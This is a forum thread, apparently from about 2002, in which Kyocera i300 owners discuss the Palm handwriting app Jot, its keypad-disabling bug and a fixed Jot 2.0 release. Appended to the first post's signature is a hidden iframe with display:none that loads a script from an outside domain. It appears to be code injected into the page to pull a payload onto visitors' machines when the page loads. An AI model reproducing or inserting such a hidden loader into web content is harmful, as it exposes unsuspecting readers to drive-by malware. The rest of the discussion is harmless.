+ Reply to Thread

Looking for an app to enlarge the i300 graffiti area (like Jot)

One of the biggest drawbacks of the i300 is the small size of the graffiti input area.

I recently dicovered a Palm app called Jot that let you enter characters on any part of the screen.
    This was the PERFECT solution to the problem, except it disabled the bottom row of buttons on the phone keypad (and crashed the OS)

Does anyone know of a similar program that works with the i300?

Thanks in advance,

--JB<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just began to setup my i300 which was received a few days agao. Re-installed the palm desktop with the i300 CD over the previous 6035 and all programs worked fine.

Have been using Jot on a Palm for 5 yrs. 1st the Palm V; the Palm IIIe; the Kyo 6035 and now the i300.

Still wounder why everyone hasn't switched to Jot. It simple and works mostly like I normally write.

----------------Revised----------------------------------------

Oh Sh**! Like others, my favorite Jot did the same as JB said. The bottom row or numbers and most of the icons at the bottom of the display do not work.

I have been using Ver 1.2 and see that there is a newer release, Ver 1.3. Has anyone tried this on the i300 and does it work??
    Last edited by cyclone3211; 12-26-2002 at 09:23 AM.

In response to my same question to CIC, I was sent a Jot 2.0
    Have not installed it yet but will tonight.

The email did not specifically indicate that this would solve the problem on the i300, but was sent as a response to that question.

I would think that it was sent to solve the problem.....ya?

Jot 2 works on the i300 without locking the phone keyboard bottom line of numbers and some of the icons below.

Just got it today..............installed tonight.............IT WORKS!!!!!!!!!

Jot 2

Jot 2 works without a hitch!

No lockup on the dial side! This is a new release....just sent out via email.

Get it! Have never found anything to better than Jot for a natural way to write directly to a Palm like unit.